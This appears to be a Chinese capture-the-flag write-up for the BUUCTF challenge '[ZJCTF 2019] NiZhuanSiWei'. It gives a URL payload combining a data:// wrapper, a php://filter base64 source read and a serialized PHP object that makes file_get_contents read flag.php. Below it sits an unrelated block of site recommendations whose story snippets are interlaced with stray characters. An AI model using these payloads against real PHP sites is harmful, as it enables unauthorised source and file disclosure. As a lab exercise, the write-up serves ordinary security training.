【BUUCTF-Web 0024】[ZJCTF 2019]NiZhuanSiWei

Subject

逆轉思維 PHP偽協(xié)議 PHP反序列化


Mind Palace

訪問url獲得代碼:

image

preg_match ( string pattern , stringsubject , array &matches = ? , intflags = 0 , int $offset = 0 ) : int => 執(zhí)行匹配正則表達式

Payload:

url/index.php
?text=text= data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
                      data://text/plain,welcome to the zjctf
&file=          php://filter/read=convert.base64-encode/resource=useless.php => useless.php
&password=  O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

第一個繞過:用data偽協(xié)議寫入文件

第二個繞過:用php://filter讀取base64編碼后的源碼 + base64解碼:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

第三個繞過(反序列化):

image

Look Ahead

PHP學的不夠扎實;

PHP偽協(xié)議總結: https://segmentfault.com/a/1190000018991087


References:

https://www.cnblogs.com/wangtanzhi/p/12184759.html

https://segmentfault.com/a/1190000018991087


<p align="center">END (?▽?)/</p>

?著作權歸作者所有,轉載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末佑笋,一起剝皮案震驚了整個濱河市蚓哩,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖芍碧,帶你破解...
    沈念sama閱讀 211,817評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異,居然都是意外死亡屯阀,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,329評論 3 385
  • 文/潘曉璐 我一進店門轴术,熙熙樓的掌柜王于貴愁眉苦臉地迎上來难衰,“玉大人,你說我怎么就攤上這事逗栽「窍” “怎么了?”我有些...
    開封第一講書人閱讀 157,354評論 0 348
  • 文/不壞的土叔 我叫張陵彼宠,是天一觀的道長鳄虱。 經(jīng)常有香客問我,道長凭峡,這世上最難降的妖魔是什么拙已? 我笑而不...
    開封第一講書人閱讀 56,498評論 1 284
  • 正文 為了忘掉前任,我火速辦了婚禮想罕,結果婚禮上悠栓,老公的妹妹穿的比我還像新娘霉涨。我一直安慰自己按价,他們只是感情好,可當我...
    茶點故事閱讀 65,600評論 6 386
  • 文/花漫 我一把揭開白布笙瑟。 她就那樣靜靜地躺著楼镐,像睡著了一般。 火紅的嫁衣襯著肌膚如雪往枷。 梳的紋絲不亂的頭發(fā)上框产,一...
    開封第一講書人閱讀 49,829評論 1 290
  • 那天,我揣著相機與錄音错洁,去河邊找鬼秉宿。 笑死,一個胖子當著我的面吹牛屯碴,可吹牛的內(nèi)容都是我干的描睦。 我是一名探鬼主播,決...
    沈念sama閱讀 38,979評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼导而,長吁一口氣:“原來是場噩夢啊……” “哼忱叭!你這毒婦竟也來了隔崎?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 37,722評論 0 266
  • 序言:老撾萬榮一對情侶失蹤韵丑,失蹤者是張志新(化名)和其女友劉穎爵卒,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體撵彻,經(jīng)...
    沈念sama閱讀 44,189評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡钓株,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,519評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了陌僵。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片享幽。...
    茶點故事閱讀 38,654評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖拾弃,靈堂內(nèi)的尸體忽然破棺而出值桩,到底是詐尸還是另有隱情,我是刑警寧澤豪椿,帶...
    沈念sama閱讀 34,329評論 4 330
  • 正文 年R本政府宣布奔坟,位于F島的核電站,受9級特大地震影響搭盾,放射性物質(zhì)發(fā)生泄漏咳秉。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,940評論 3 313
  • 文/蒙蒙 一鸯隅、第九天 我趴在偏房一處隱蔽的房頂上張望澜建。 院中可真熱鬧,春花似錦蝌以、人聲如沸炕舵。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,762評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽咽筋。三九已至,卻和暖如春徊件,著一層夾襖步出監(jiān)牢的瞬間奸攻,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,993評論 1 266
  • 我被黑心中介騙來泰國打工虱痕, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留睹耐,地道東北人。 一個月前我還...
    沈念sama閱讀 46,382評論 2 360
  • 正文 我出身青樓部翘,卻偏偏與公主長得像硝训,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 43,543評論 2 349

推薦閱讀更多精彩內(nèi)容